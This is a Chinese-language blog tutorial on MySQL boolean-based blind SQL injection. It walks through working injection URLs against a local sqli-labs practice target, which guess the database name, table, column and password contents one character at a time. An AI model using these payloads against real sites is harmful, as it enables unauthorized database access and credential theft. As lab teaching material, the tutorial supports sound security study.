Mysql注入 -- 布尔注入

千万不要在你还没辞职的时候,告诉你同事说要辞职了。。。

----  网易云热评   

一、常用函数

1、mid(str,1,5):取字符串str的前5个字节

2、ord():转换成ASCII码

3、length():统计长度

4、 ascii():将字符转换ASCII

Mysql注入 -- 布尔注入

二、实例演示

1、and 1=1

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=1 --+ 返回正确
Mysql注入 -- 布尔注入

2、and 1=2

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=2 --+ 返回错误
Mysql注入 -- 布尔注入

3、判断数据库长度

http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=8 --+返回正常,说明数据库长度为8http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=9 --+返回错误

4、判断数据库第一个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),1,1)='s' --+ 不停的修改二十六个字母,知道正确为之

5、判断数据库第二个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),2,1)='e' --+ 最终获取数据库的名称为“security”

6、获取表名,最终获取表名users

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+

7、获取字段名,最终获取字段名password

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+

8、获取字段内容,最终获取一个名为admin的内容

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select password from users limit 8,1),1,1)='a' --+

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

Mysql注入 -- 布尔注入 Mysql注入 -- 布尔注入 Mysql注入 -- 布尔注入

版权声明:玥玥 发表于 2021-05-17 7:16:24。
转载请注明:Mysql注入 -- 布尔注入 | 女黑客导航